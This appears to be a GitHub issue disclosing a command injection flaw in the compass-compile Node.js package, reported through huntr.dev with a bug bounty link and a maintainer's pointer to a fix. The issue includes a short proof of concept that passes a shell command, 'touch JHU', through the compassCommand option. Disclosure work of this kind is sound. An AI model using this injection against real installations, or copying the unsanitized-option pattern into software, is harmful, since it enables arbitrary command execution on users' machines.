quaertym / compass-compile

Compass wrapper for node.js
MIT License

huntr.dev - Command Injection #1

Open huntr-helper opened 4 years ago

huntr-helper commented 4 years ago

Vulnerability Description

Affected versions of this package are vulnerable to Command Injection. The options argument can be controlled by users without any sanitization.

POC:

// POC as posted: the compassCommand option is executed without sanitization,
// so an arbitrary shell command supplied here runs when compile() is called.
var Root = require('compass-compile');
var root = new Root();
var options = {
    compassCommand: "touch JHU"   // attacker-controlled value reaches the shell
};
root.compile(options);

Bug Bounty

We have opened up a bounty for this issue on our bug bounty platform. Want to solve this vulnerability and get rewarded 💰? Go to https://huntr.dev/

JamieSlome commented 4 years ago

A pull request/fix has been suggested (https://github.com/quaertym/compass-compile/pull/2).